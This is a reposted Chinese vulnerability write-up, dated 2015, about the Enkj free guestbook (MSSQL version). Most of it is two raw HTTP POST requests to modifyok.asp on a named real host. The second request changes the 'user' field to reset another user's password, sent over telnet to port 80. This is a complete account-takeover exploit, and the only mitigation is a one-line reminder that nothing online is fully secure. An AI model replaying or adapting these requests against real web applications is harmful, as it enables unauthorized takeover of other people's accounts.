亿恩免费留言薄MSSQL版修改任意用户密码漏洞
- 时间:2015年04月02日 12:02:11 来源:魔法猪系统重装大师官网 人气:13994
亿恩免费留言薄MSSQL版修改任意用户密码漏洞 |
漏洞为高风险 比如: http://enkj.com/gbook/guestbook.asp?user=bingel 这个是我自己申请用来做测试的免费留言簿 我申请完之后进入修改一下密码 用winsock expert 捕获了如下数据 POST http://enkj.com/gbook/modifyok.asp HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, application/vnd.ms-powerpoint, application/vnd.ms-excel, */* Referer: http://enkj.com/gbook/modify.asp?edit=ok Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2) Host: enkj.com Content-Length: 122 Pragma: no-cache Cookie: ASPSESSIONIDCQASSDQA=JHCEGLHCBINJDFOLDAHMKMNG user=bingel&pass=123456789&zhanzhang=bingel&kind=1&email=binghen@hotmail.com &web=fuck&url=http%3A%2F%2Fsafdafda.com&intro= 这上面一个是关键的东东. 有了这个东东你就可以修改任意用户的密码了 比如你要修改一个用户名为lin的用户的留言簿的密码.只要 telnet enkj.com 80 然后发送post如下数据就可以了. POST http://enkj.com/gbook/modifyok.asp HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, application/vnd.ms-powerpoint, application/vnd.ms-excel, */* Referer: http://enkj.com/gbook/modify.asp?edit=ok Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2) Host: enkj.com Content-Length: 122 Pragma: no-cache Cookie: ASPSESSIONIDCQASSDQA=JHCEGLHCBINJDFOLDAHMKMNG user=lin&pass=123456789&zhanzhang=bingel&kind=1&email=binghen@hotmail.com&web=fuck &url=http%3A%2F%2Fsafdafda.com&intro= 这样就把用户名为lin的用户的密码修改为123456789 其它的没有必要多说,大家看看就知道是怎么回事了.这个漏洞也只是偶然发现.没有什么技术可言.只是给大家一个提醒. 网络上没有绝对的安全. |
上一篇:qq等级加速异常 qq等级加速新方案
下一篇:qq登陆地点查询教程